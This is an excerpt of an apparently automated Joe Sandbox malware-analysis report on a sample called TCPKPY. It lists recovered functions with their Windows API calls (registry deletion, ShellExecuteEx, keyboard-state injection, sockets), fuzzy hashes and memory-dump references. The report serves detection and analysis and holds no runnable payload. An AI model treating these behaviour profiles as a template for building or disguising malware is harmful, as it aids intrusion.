                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoad
                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                • Opcode ID: 058ce5e34572b6947edb405ce069f01c53ee9352cf32cb2ca474b980775c0fc1
                                                                                                                • Instruction ID: e6e870b87c9ee2407482f170a81234e7fea9915ebfe093acef3387fb3f800292
                                                                                                                • Opcode Fuzzy Hash: 058ce5e34572b6947edb405ce069f01c53ee9352cf32cb2ca474b980775c0fc1
                                                                                                                • Instruction Fuzzy Hash: 3C11EE352283537ED709DE549C4ADAA73AC9F17764B10002AF901666C1F7E069714569
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00247595
                                                                                                                • LoadStringW.USER32(00000000), ref: 0024759C
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002475B2
                                                                                                                • LoadStringW.USER32(00000000), ref: 002475B9
                                                                                                                • _wprintf.LIBCMT ref: 002475DF
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002475FD
                                                                                                                Strings
                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 002475DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                • API String ID: 3648134473-3128320259
                                                                                                                • Opcode ID: ed76fda2cd93f20951d716a7922a0b5e387adb99bfca5744f296ee367cf1a271
                                                                                                                • Instruction ID: fd35b8112976bce0b8c7ff8b43c4b03eadaab36c20f77632426cb5135cb03f69
                                                                                                                • Opcode Fuzzy Hash: ed76fda2cd93f20951d716a7922a0b5e387adb99bfca5744f296ee367cf1a271
                                                                                                                • Instruction Fuzzy Hash: 910162F6500208BFE711ABA4BD8DEEB376CDB04300F4004A2B705D2081EA749E988B70
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                  • Part of subcall function 00263AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00262AA6,?,?), ref: 00263B0E
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00262AE7
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: BuffCharConnectRegistryUpper_memmove
• String ID:
• API String ID: 3479070676-0
• Opcode ID: 5db3e5b4926c2d3702e1a56eb37fd67d567cfb6ce6b8642a385cd5d47464b313
• Instruction ID: b6a2576cf0c14c4a733f2389390af95e5f70b832de6b19b50b5248e3099b8614
• Opcode Fuzzy Hash: 5db3e5b4926c2d3702e1a56eb37fd67d567cfb6ce6b8642a385cd5d47464b313
• Instruction Fuzzy Hash: 95915735224601EFCB04EF54C895B6EB7E5EF84314F14880DF5969B2A2DB70E9A9CF42
APIs
• __mtinitlocknum.LIBCMT ref: 0022B744
  • Part of subcall function 00228A0C: __FF_MSGBANNER.LIBCMT ref: 00228A21
  • Part of subcall function 00228A0C: __NMSG_WRITE.LIBCMT ref: 00228A28
  • Part of subcall function 00228A0C: __malloc_crt.LIBCMT ref: 00228A48
• __lock.LIBCMT ref: 0022B757
• __lock.LIBCMT ref: 0022B7A3
• InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,002B6948,00000018,00236C2B,?,00000000,00000109), ref: 0022B7BF
• EnterCriticalSection.KERNEL32(8000000C,002B6948,00000018,00236C2B,?,00000000,00000109), ref: 0022B7DC
• LeaveCriticalSection.KERNEL32(8000000C), ref: 0022B7EC
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
• String ID:
• API String ID: 1422805418-0
• Opcode ID: 9a2e8376f87e2ac466d2b8f3f02cb75f50efb59ebfdd2ca2ce2f414d150bad44
• Instruction ID: 4ce0c052bf571fc092434bd52d694b5725c6704bf721cfc4ac08aa8ad7831ec2
• Opcode Fuzzy Hash: 9a2e8376f87e2ac466d2b8f3f02cb75f50efb59ebfdd2ca2ce2f414d150bad44
• Instruction Fuzzy Hash: F9412A71D20236ABEB119FE8F88876CF7A4BF41735F148218E429AB2D1D7749864CF91
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 0024A1CE
  • Part of subcall function 0022010A: std::exception::exception.LIBCMT ref: 0022013E
  • Part of subcall function 0022010A: __CxxThrowException@8.LIBCMT ref: 00220153
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0024A205
• EnterCriticalSection.KERNEL32(?), ref: 0024A221
• _memmove.LIBCMT ref: 0024A26F
• _memmove.LIBCMT ref: 0024A28C
• LeaveCriticalSection.KERNEL32(?), ref: 0024A29B
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0024A2B0
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0024A2CF
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 256516436-0
• Opcode ID: 9c3724b1ce89bbaf1f319b806a148a25f574a619e917c8f3617be8bc9ca42804
• Instruction ID: e02b5ea57709833c5ea528a66756e630a59e5592a1fc18b9da1c9fef40f2490d
• Opcode Fuzzy Hash: 9c3724b1ce89bbaf1f319b806a148a25f574a619e917c8f3617be8bc9ca42804
• Instruction Fuzzy Hash: DF318431900205EBDB40EFA4EC89EAEB7B9FF45310B1480A5FD04AB296D774DD64DB61
APIs
• DeleteObject.GDI32(00000000), ref: 00268CF3
• GetDC.USER32(00000000), ref: 00268CFB
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00268D06
• ReleaseDC.USER32(00000000,00000000), ref: 00268D12
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00268D4E
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00268D5F
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0026BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00268D99
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00268DB9
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: 5fd780cf920537bf7652dae78a85cd7184ba2a5d839ef1b9d67da590eb35fa9c
• Instruction ID: 8b147f54fc3c1e36a879c5b747b90c21c48887dbecdffe147a220523187f5df9
• Opcode Fuzzy Hash: 5fd780cf920537bf7652dae78a85cd7184ba2a5d839ef1b9d67da590eb35fa9c
• Instruction Fuzzy Hash: 78318B76201214BBEB108F61EC8AFEA3BADEF49755F044155FE08DA1D1DAB59C41CBB0
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e04f9add18bf3121311191f7a420905d01ce3e3febb96233a9da471f36248d4
• Instruction ID: c1112b0fd9e83f4194c65433f893af22180fa499fb6fd0abf97b09c5a3de02d3
• Opcode Fuzzy Hash: 4e04f9add18bf3121311191f7a420905d01ce3e3febb96233a9da471f36248d4
• Instruction Fuzzy Hash: 7D715A75910109EFCB05CF98CC88AEEBBB5FF99314F14C159F915AA291C7309AA1CF60
APIs
• _memset.LIBCMT ref: 0026214B
• _memset.LIBCMT ref: 00262214
• ShellExecuteExW.SHELL32(?), ref: 00262259
  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
  • Part of subcall function 00203BCF: _wcscpy.LIBCMT ref: 00203BF2
• CloseHandle.KERNEL32(00000000), ref: 00262320
• FreeLibrary.KERNEL32(00000000), ref: 0026232F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 4082843840-2766056989
• Opcode ID: baa0f40cdca20c8ef0eb2c68dcd69ed50e4daf1c215a78f13ab95198ee72838c
• Instruction ID: 29cb7d00c8adc8e40a722aae855592627cac99a38382aa05b825f41cabbf01c9
• Opcode Fuzzy Hash: baa0f40cdca20c8ef0eb2c68dcd69ed50e4daf1c215a78f13ab95198ee72838c
• Instruction Fuzzy Hash: 99719D74A20619DFCB04EFA4C99599EB7F5FF48310F108059E849AB392DB30ADA4CF90
APIs
• GetParent.USER32(?), ref: 0024481D
• GetKeyboardState.USER32(?), ref: 00244832
• SetKeyboardState.USER32(?), ref: 00244893
• PostMessageW.USER32(?,00000101,00000010,?), ref: 002448C1
• PostMessageW.USER32(?,00000101,00000011,?), ref: 002448E0
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00244926
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00244949
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 53de61bf5ff8cb276033495ab8bcf744ac331805a3917f19334da1eff8a1a059
• Instruction ID: f1a3fa739114ca89b23ddffccd1091a1bdb633b0d25243f8b6b0676817d10531
• Opcode Fuzzy Hash: 53de61bf5ff8cb276033495ab8bcf744ac331805a3917f19334da1eff8a1a059
• Instruction Fuzzy Hash: 5C51E7B09287D63DFB3A6B248C05BBBBF995F06304F088589E1D5564C3C6D4EDA8EB50
APIs
• GetParent.USER32(00000000), ref: 00244638
• GetKeyboardState.USER32(?), ref: 0024464D
• SetKeyboardState.USER32(?), ref: 002446AE
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002446DA
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002446F7
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0024473B
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0024475C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                • Opcode ID: 2cbf68e7f10cd02aaafed1e62d1cd55ea6870b4dfb3ad57d945eb69a7a68aac6
                                                                                                                • Instruction ID: 87eb63e8408c2539bf118e6a084d2435844daa94df5349d24e21c5559df72d3a
                                                                                                                • Opcode Fuzzy Hash: 2cbf68e7f10cd02aaafed1e62d1cd55ea6870b4dfb3ad57d945eb69a7a68aac6
                                                                                                                • Instruction Fuzzy Hash: 805108A05247D73DFB3AAB248C45B76FF99AB07304F084489E1D55A8C2D3D4ECA9DB50
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsncpy$LocalTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 2945705084-0
                                                                                                                • Opcode ID: 402352b4582eb2b76a25f4bf5ddadde386c4eb9dd1f67d46a2aee5b465e522a0
                                                                                                                • Instruction ID: c6dec6133ce349d97d8f7014ee028ce3cf08e74e384d7758cc26ec79d72ea400
                                                                                                                • Opcode Fuzzy Hash: 402352b4582eb2b76a25f4bf5ddadde386c4eb9dd1f67d46a2aee5b465e522a0
                                                                                                                • Instruction Fuzzy Hash: 45413165C30228B5DB10EBF4D886ACFB7ACAF15310F508566E914F3131EA31E675CBA6
                                                                                                                APIs
                                                                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0029DBF0), ref: 00259409
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00259416
                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 0025943A
                                                                                                                • #16.WSOCK32(?,?,00000000,00000000), ref: 00259452
                                                                                                                • _strlen.LIBCMT ref: 00259484
                                                                                                                • _memmove.LIBCMT ref: 002594CA
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 002594F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2795762555-0
                                                                                                                • Opcode ID: b3751c580af810eb08ad3c15f29d1a67b030df74dcaff8eb31e2a9546c6baae3
                                                                                                                • Instruction ID: 3cf9da27dc3d458c412dff14732e3fb62190c411c36010ddfbd275cc79b8031b
                                                                                                                • Opcode Fuzzy Hash: b3751c580af810eb08ad3c15f29d1a67b030df74dcaff8eb31e2a9546c6baae3
                                                                                                                • Instruction Fuzzy Hash: 0C41A475510204EFCB14EF64DD85EAEB7B9EF48310F108159F916972D2DB309E65CB60
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00269DB0
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00269E57
                                                                                                                • IsMenu.USER32(?), ref: 00269E6F
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00269EB7
                                                                                                                • DrawMenuBar.USER32 ref: 00269ED0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3866635326-4108050209
                                                                                                                • Opcode ID: 17d64beea56a02c06eaae697b28943cf5a78f282e8ecf9998103c35dba215879
                                                                                                                • Instruction ID: bd61b344444953d13c8fa23982566f4b0a6b451fa21977b6d1e6ac9eecd61a0c
                                                                                                                • Opcode Fuzzy Hash: 17d64beea56a02c06eaae697b28943cf5a78f282e8ecf9998103c35dba215879
                                                                                                                • Instruction Fuzzy Hash: A9412975A1020AEFDB10DF54E884E9ABBF8FF05364F04812AE90597291DB71EDA4CB50
                                                                                                                APIs
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00263C92
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00263CBC
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00263D71
                                                                                                                  • Part of subcall function 00263C63: RegCloseKey.ADVAPI32(?), ref: 00263CD9
                                                                                                                  • Part of subcall function 00263C63: FreeLibrary.KERNEL32(?), ref: 00263D2B
                                                                                                                  • Part of subcall function 00263C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00263D4E
                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00263D16
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 395352322-0
                                                                                                                • Opcode ID: 1e4711c5e3e153a87ccf13b311135481662a1b0b0207ffe461e621e250c90c91
                                                                                                                • Instruction ID: d5c003cf0504f30b6f0a2f08de2e0c1203fca56e829ef7a886b510d654f7b3fe
                                                                                                                • Opcode Fuzzy Hash: 1e4711c5e3e153a87ccf13b311135481662a1b0b0207ffe461e621e250c90c91
                                                                                                                • Instruction Fuzzy Hash: F1311A7592120ABFDB15DF94DC89EFEB7BCEF09300F10016AE512E2190D6709F999B60
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00268DF4
                                                                                                                • GetWindowLongW.USER32(00BCBB10,000000F0), ref: 00268E27
                                                                                                                • GetWindowLongW.USER32(00BCBB10,000000F0), ref: 00268E5C
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00268E8E
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00268EB8
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00268EC9
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00268EE3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2178440468-0
                                                                                                                • Opcode ID: ec971262cc1d48c5a5d8be1005f6b032b4454a394a48a96deb10e528c43721b2
                                                                                                                • Instruction ID: f79adc2065909c8f1e09517247725bec774c1a7b0b855c53827797985177512a
                                                                                                                • Opcode Fuzzy Hash: ec971262cc1d48c5a5d8be1005f6b032b4454a394a48a96deb10e528c43721b2
                                                                                                                • Instruction Fuzzy Hash: A0314435654216EFEB20DF58EC89F5537E5FB4A314F1442A4F5058B2B2CB72ACA0CB40
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00241734
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0024175A
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0024175D
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0024177B
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00241784
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 002417A9
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 002417B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761583154-0
                                                                                                                • Opcode ID: c16dc05a57fa3b1041d809b49dd77f396263542eb708729d0b60472f27a6fd38
                                                                                                                • Instruction ID: 1d81cc81dbbc75ac9e3923e4e103cf1442cd40acb45e0a567d2749518e74496c
